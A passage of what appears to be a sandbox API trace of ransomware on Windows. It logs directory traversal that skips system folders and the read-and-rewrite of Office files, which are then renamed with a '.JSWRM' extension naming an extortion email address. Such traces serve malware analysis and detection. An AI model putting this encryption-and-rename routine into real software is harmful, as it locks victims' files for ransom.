(in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.721] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0122.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0122.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0122.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0122.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.722] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf2ed8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf2ed8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaf2ed8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINWORD_K_COL.HXK", cAlternateFileName="WINWOR~1.HXK")) returned 1 [0122.722] lstrcmpiW (lpString1="WINWORD_K_COL.HXK", lpString2=".") returned 1 [0122.722] lstrcmpiW (lpString1="WINWORD_K_COL.HXK", lpString2="..") returned 1 [0122.722] lstrcmpiW (lpString1="WINWORD_K_COL.HXK", lpString2="...") returned 1 [0122.722] lstrcmpiW (lpString1="WINWORD_K_COL.HXK", lpString2="windows") returned 1 [0122.722] lstrcmpiW (lpString1="WINWORD_K_COL.HXK", lpString2="recovery") returned 1 [0122.722] lstrcmpiW (lpString1="WINWORD_K_COL.HXK", lpString2="perflogs") returned 1 [0122.722] lstrcmpiW (lpString1="WINWORD_K_COL.HXK", lpString2="documents and settings") returned 1 [0122.722] lstrcmpiW (lpString1="WINWORD_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.722] lstrcmpiW (lpString1="WINWORD_K_COL.HXK", lpString2="system volume information") returned 1 [0122.722] lstrcmpiW (lpString1="WINWORD_K_COL.HXK", lpString2="msocache") returned 1 [0122.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINWORD_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0122.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINWORD_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0122.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0122.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0122.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.723] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0122.723] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0122.723] ReadFile (in: hFile=0x238, lpBuffer=0x2092d8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.724] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.724] WriteFile (in: hFile=0x238, lpBuffer=0x2092d8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0122.724] CloseHandle (hObject=0x238) returned 1 [0122.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0122.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0122.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0122.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0122.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0122.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0122.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0122.725] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0122.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0122.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.725] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c3a235, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1c3a235, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1c3a235, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd8a8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WORKFLOW.VSL", cAlternateFileName="")) returned 1 [0122.725] lstrcmpiW (lpString1="WORKFLOW.VSL", lpString2=".") returned 1 [0122.725] lstrcmpiW (lpString1="WORKFLOW.VSL", lpString2="..") returned 1 [0122.726] lstrcmpiW (lpString1="WORKFLOW.VSL", lpString2="...") returned 1 [0122.726] lstrcmpiW (lpString1="WORKFLOW.VSL", lpString2="windows") returned 1 [0122.726] lstrcmpiW (lpString1="WORKFLOW.VSL", lpString2="recovery") returned 1 [0122.726] lstrcmpiW (lpString1="WORKFLOW.VSL", lpString2="perflogs") returned 1 [0122.726] lstrcmpiW (lpString1="WORKFLOW.VSL", lpString2="documents and settings") returned 1 [0122.726] lstrcmpiW (lpString1="WORKFLOW.VSL", lpString2="$RECYCLE.BIN") returned 1 [0122.726] lstrcmpiW (lpString1="WORKFLOW.VSL", lpString2="system volume information") returned 1 [0122.726] lstrcmpiW (lpString1="WORKFLOW.VSL", lpString2="msocache") returned 1 [0122.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0122.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORKFLOW.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORKFLOW.VSL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WORKFLOW.VSL", lpUsedDefaultChar=0x0) returned 12 [0122.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0122.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0122.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORKFLOW.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORKFLOW.VSL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WORKFLOW.VSL", lpUsedDefaultChar=0x0) returned 12 [0122.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0122.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0122.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0122.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WORKFLOW.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\workflow.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.727] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=55464) returned 1 [0122.727] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd8a0) returned 0x24e1d8 [0122.727] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd8a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd8a0, lpOverlapped=0x0) returned 1 [0122.732] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.732] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd8a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd8a0, lpOverlapped=0x0) returned 1 [0122.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.734] CloseHandle (hObject=0x238) returned 1 [0122.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0122.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0122.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0122.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0122.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0122.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.734] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WORKFLOW.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\workflow.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WORKFLOW.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\workflow.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0122.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.735] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd8a5d714, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbbaa0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WWINTL.DLL", cAlternateFileName="")) returned 1 [0122.735] lstrcmpiW (lpString1="WWINTL.DLL", lpString2=".") returned 1 [0122.735] lstrcmpiW (lpString1="WWINTL.DLL", lpString2="..") returned 1 [0122.735] lstrcmpiW (lpString1="WWINTL.DLL", lpString2="...") returned 1 [0122.735] lstrcmpiW (lpString1="WWINTL.DLL", lpString2="windows") returned 1 [0122.735] lstrcmpiW (lpString1="WWINTL.DLL", lpString2="recovery") returned 1 [0122.735] lstrcmpiW (lpString1="WWINTL.DLL", lpString2="perflogs") returned 1 [0122.735] lstrcmpiW (lpString1="WWINTL.DLL", lpString2="documents and settings") returned 1 [0122.735] lstrcmpiW (lpString1="WWINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0122.735] lstrcmpiW (lpString1="WWINTL.DLL", lpString2="system volume information") returned 1 [0122.735] lstrcmpiW (lpString1="WWINTL.DLL", lpString2="msocache") returned 1 [0122.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0122.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WWINTL.DLL", lpUsedDefaultChar=0x0) returned 10 [0122.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0122.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0122.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WWINTL.DLL", lpUsedDefaultChar=0x0) returned 10 [0122.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0122.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0122.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0122.736] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0442ead, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0442ead, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0442ead, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4870, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="wxpr.dll", cAlternateFileName="")) returned 1 [0122.736] lstrcmpiW (lpString1="wxpr.dll", lpString2=".") returned 1 [0122.736] lstrcmpiW (lpString1="wxpr.dll", lpString2="..") returned 1 [0122.736] lstrcmpiW (lpString1="wxpr.dll", lpString2="...") returned 1 [0122.736] lstrcmpiW (lpString1="wxpr.dll", lpString2="windows") returned 1 [0122.736] lstrcmpiW (lpString1="wxpr.dll", lpString2="recovery") returned 1 [0122.736] lstrcmpiW (lpString1="wxpr.dll", lpString2="perflogs") returned 1 [0122.736] lstrcmpiW (lpString1="wxpr.dll", lpString2="documents and settings") returned 1 [0122.736] lstrcmpiW (lpString1="wxpr.dll", lpString2="$RECYCLE.BIN") returned 1 [0122.736] lstrcmpiW (lpString1="wxpr.dll", lpString2="system volume information") returned 1 [0122.736] lstrcmpiW (lpString1="wxpr.dll", lpString2="msocache") returned 1 [0122.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0122.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wxpr.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0122.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wxpr.dll", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wxpr.dll", lpUsedDefaultChar=0x0) returned 8 [0122.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0122.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0122.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wxpr.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0122.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wxpr.dll", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wxpr.dll", lpUsedDefaultChar=0x0) returned 8 [0122.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0122.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0122.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0122.736] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x28e4acd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x28e4acd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x28e4acd, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf070, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="XFUNC.VSL", cAlternateFileName="")) returned 1 [0122.736] lstrcmpiW (lpString1="XFUNC.VSL", lpString2=".") returned 1 [0122.736] lstrcmpiW (lpString1="XFUNC.VSL", lpString2="..") returned 1 [0122.736] lstrcmpiW (lpString1="XFUNC.VSL", lpString2="...") returned 1 [0122.736] lstrcmpiW (lpString1="XFUNC.VSL", lpString2="windows") returned 1 [0122.736] lstrcmpiW (lpString1="XFUNC.VSL", lpString2="recovery") returned 1 [0122.736] lstrcmpiW (lpString1="XFUNC.VSL", lpString2="perflogs") returned 1 [0122.736] lstrcmpiW (lpString1="XFUNC.VSL", lpString2="documents and settings") returned 1 [0122.736] lstrcmpiW (lpString1="XFUNC.VSL", lpString2="$RECYCLE.BIN") returned 1 [0122.736] lstrcmpiW (lpString1="XFUNC.VSL", lpString2="system volume information") returned 1 [0122.736] lstrcmpiW (lpString1="XFUNC.VSL", lpString2="msocache") returned 1 [0122.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0122.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XFUNC.VSL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0122.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XFUNC.VSL", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XFUNC.VSL", 